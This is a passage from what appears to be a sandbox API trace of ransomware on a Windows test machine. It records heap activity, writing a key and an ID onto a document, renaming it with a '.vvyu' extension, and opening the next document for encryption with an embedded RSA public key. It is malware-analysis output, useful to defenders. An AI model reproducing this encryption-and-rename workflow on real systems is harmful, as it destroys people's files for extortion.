(HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a300 [0196.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0196.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0196.775] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0196.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0196.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0196.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0196.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0196.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0196.775] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a300 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a2e8 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2be2220 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27748 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0196.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0196.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.776] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0196.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0196.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0196.777] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0196.777] GetCurrentThreadId () returned 0x264 [0196.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0196.777] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d47560 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84b70 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c31700 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.778] GetCurrentThreadId () returned 0x264 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.778] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.778] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0196.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.779] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0196.779] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0196.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0196.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a348 [0196.780] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0196.780] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2e8 [0196.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0196.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a300 [0196.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c443e8 [0196.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a2d0 [0196.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a360 [0196.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378d0 [0196.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0196.781] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a330 [0196.781] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a318 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a378 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a318 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a330 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378b0 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27748 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a2e8 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2ccdff0 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a348 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a378 | out: hHeap=0x6a0000) returned 1 [0196.782] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0196.782] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27748 | out: hHeap=0x6a0000) returned 1 [0196.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c0ec50 [0196.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0196.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0196.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2e8 | out: hHeap=0x6a0000) returned 1 [0196.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0196.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0196.783] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0196.783] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0196.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0196.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0196.784] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0196.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0196.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.785] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a318 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a360 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a300 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2d0 | out: hHeap=0x6a0000) returned 1 [0196.786] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0196.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0196.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0196.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a2b8 | out: hHeap=0x6a0000) returned 1 [0196.787] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cfb0 | out: hHeap=0x6a0000) returned 1 [0196.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0196.788] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0196.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0196.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0196.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0196.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0196.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0196.789] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0196.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0196.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0196.790] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0196.790] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0x24d5, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0x24d5, lpOverlapped=0x0) returned 1 [0196.791] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0196.791] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x24da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.791] WriteFile (in: hFile=0x52c, lpBuffer=0x2be2220*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2be2220*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0196.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0196.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0196.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0196.792] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0196.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0196.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0196.792] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0196.792] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0196.793] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0196.793] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0196.793] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0196.793] CloseHandle (hObject=0x52c) returned 1 [0196.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb0) returned 0x2bee380 [0196.794] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d3a670 [0196.795] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bee380 | out: hHeap=0x6a0000) returned 1 [0196.795] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\aiG5nj9ZiLn1Ciu Lcka.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\tawx51mud\\aig5nj9ziln1ciu lcka.odt"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\aiG5nj9ZiLn1Ciu Lcka.odt.vvyu" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\tawx51mud\\aig5nj9ziln1ciu lcka.odt.vvyu")) returned 1 [0196.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0196.797] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.797] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0196.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0196.800] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7bab580, ftCreationTime.dwHighDateTime=0x1d89f9d, ftLastAccessTime.dwLowDateTime=0xad6a5cf0, ftLastAccessTime.dwHighDateTime=0x1d8a1d3, ftLastWriteTime.dwLowDateTime=0xad6a5cf0, ftLastWriteTime.dwHighDateTime=0x1d8a1d3, nFileSizeHigh=0x0, nFileSizeLow=0x18885, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MGhT3.doc", cAlternateFileName="")) returned 1 [0196.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eab40 [0196.800] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xbe) returned 0x2c5b3e8 [0196.800] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eab40 | out: hHeap=0x6a0000) returned 1 [0196.800] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\MGhT3.doc") returned=".doc" [0196.800] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\AzlD\\PeBfuwtoR 4\\ivoTJ\\TawX51muD\\MGhT3.doc" (normalized: "c:\\users\\keecfmwgj\\documents\\azld\\pebfuwtor 4\\ivotj\\tawx51mud\\mght3.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0196.801] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=100485) returned 1 [0196.801] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0196.804] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x1885f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0196.804] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0196.806] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0196.807] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0196.807] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0196.807] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x18885, lpOverlapped=0x0) returned 1 [0196.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.808] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0196.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.808] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0196.808] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eab40) returned 1 [0196.809] CryptCreateHash (in: hProv=0x6eab40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0196.809] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0196.809] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0196.809] RtlAllocateHeap 